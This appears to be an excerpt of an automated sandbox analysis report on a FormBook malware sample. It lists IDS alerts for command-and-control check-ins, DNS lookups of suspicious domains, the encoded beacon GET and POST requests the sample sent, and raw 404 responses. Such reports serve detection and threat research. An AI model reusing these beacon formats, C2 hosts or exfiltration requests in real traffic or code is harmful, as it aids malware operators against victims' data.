Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49946 -> 194.195.220.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 23.167.152.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 103.230.159.86:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 103.230.159.86:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50046 -> 199.59.243.228:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 199.59.243.228:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50042 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 194.245.148.189:80
                Source: DNS query: www.beylikduzu616161.xyz
                Source: DNS query: www.dating-apps-az-dn5.xyz
                Source: Joe Sandbox View | IP Address: 194.195.220.41
                Source: Joe Sandbox View | IP Address: 209.74.77.109
                Source: Joe Sandbox View | IP Address: 188.114.97.3
                Source: Joe Sandbox View | ASN Name: NEXINTO-DE
                Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View | ASN Name: MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU
                Source: Joe Sandbox View | ASN Name: CSLDE
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe | Code function: 0_2_00EC4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00EC4EB5
                Source: global traffic | HTTP traffic detected: GET /vluw/?F4=Q0yHy&xP7x=Qny9vPKZpQxlYqiENFjzCT0tS9CtbOtoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G+xnVYsPewXyxj+EGxgkPVAzfrNGcH22OaL0= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.zkdamdjj.shop | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /a4h7/?xP7x=PP6GFaOQILwxi5diAyqRnR0HCUuPn1KM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQKmR9Tyuvz8OKoog24WuNruFHA9eSGHCBo40=&F4=Q0yHy HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.75178.club | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /k6yn/?F4=Q0yHy&xP7x=tNpa1p20+8HvGGTFO8I9keuPU7tOKng9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV4TqG+qZ72KE+To3i0rNZuThB0u31oMhQ62I= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.orbitoasis.online | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /cboa/?xP7x=af1TSyH9ZKWDWOLhq+7f7Nkki45aGMI6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdZizK3lLDCsG8NLzHSA4XR2l55JJp9Jslyik=&F4=Q0yHy HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.thaor56.online | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /0gis/?F4=Q0yHy&xP7x=aMrcg/vn2G/nVrncRMrksgj//l1iguTCuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbbVz+e205UYRB0QccYqidFK5nXCUGR2PtEFk= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.earbudsstore.shop | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /bwyw/?xP7x=zeqgG3zf3rSD22A0zF0pS4vI7saWqLmuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wffK6dIQcBGg0ObpA/yX4xEky+b5csM5WXdi0=&F4=Q0yHy HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.superiorfencing.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.beylikduzu616161.xyz | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /gxyh/?xP7x=xivIugper8hSVuoO04uKuRFsECiR4QMGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT+8RMEQc9vH5Jgj7hQnpQkzk/1bmr1+yLEUs8=&F4=Q0yHy HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.zxyck.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /n9b0/?F4=Q0yHy&xP7x=A8VrqyfvUbO/Hw2LPQ1UsX5BwNVpcsHZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd6thTTSLohUKEi8xodPTyp3tNekr0IM36mEI= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.dailyfuns.info | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.mydreamdeal.click | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /dvmh/?F4=Q0yHy&xP7x=oFIEYIO2gjvnF7MstK6lKHEue9aF/tlAMWbI9WLDgwNy2jujsZOasn0dsRYzh1BdbVLS+4ZlfSYhPFaSDYrrMgKpzoJ2CbempAqVOW6SbKF8YFlZ5FonZlU= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.maitreyatoys.world | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | HTTP traffic detected: GET /pn0u/?xP7x=jGu0qTD/ksVhc8OTP4HC7zBU+1XTPuzc0Uy7xFC8PHDlZ2G4sa+fF6flpU/b3trkgDVJnaEHcK2UYYJju1sH3kzyJpZIX8bfuxajpqPIVOEtPxAfDoAlEB0=&F4=Q0yHy HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.dating-apps-az-dn5.xyz | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic | DNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: global traffic | DNS traffic detected: DNS query: www.75178.club
                Source: global traffic | DNS traffic detected: DNS query: www.orbitoasis.online
                Source: global traffic | DNS traffic detected: DNS query: www.thaor56.online
                Source: global traffic | DNS traffic detected: DNS query: www.earbudsstore.shop
                Source: global traffic | DNS traffic detected: DNS query: www.superiorfencing.net
                Source: global traffic | DNS traffic detected: DNS query: www.beylikduzu616161.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.zxyck.net
                Source: global traffic | DNS traffic detected: DNS query: www.dailyfuns.info
                Source: global traffic | DNS traffic detected: DNS query: www.mydreamdeal.click
                Source: global traffic | DNS traffic detected: DNS query: www.maitreyatoys.world
                Source: global traffic | DNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
                Source: unknown | HTTP traffic detected: POST /a4h7/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Host: www.75178.club | Origin: http://www.75178.club | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Content-Length: 201 | Connection: close | Referer: http://www.75178.club/a4h7/ | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko | Data Ascii: xP7x=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHaVT6CysBVP6t+hckKFs1otsQJEt1rYUvcg==
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 08 Jan 2025 15:12:50 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vg9K6nnpsc8a5xr7oBYICIlg96XaNb08ap2IHSE9WTt504awDpJiBxITKkB22lCc6fTq9vD1MdijigyNDqOzbENNnC%2FxSMbdVOQf%2FPyvdIoXH4EcfMPsP%2BSkY4v%2B84YK5kqw0g%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8fed20c879421891-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1694&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Wed, 08 Jan 2025 15:13:19 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Wed, 08 Jan 2025 15:13:22 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Wed, 08 Jan 2025 15:13:24 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | date: Wed, 08 Jan 2025 15:13:27 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Wed, 08 Jan 2025 15:13:32 GMT
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Wed, 08 Jan 2025 15:13:37 GMT
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Wed, 08 Jan 2025 15:13:39 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 08 Jan 2025 15:13:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 
30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
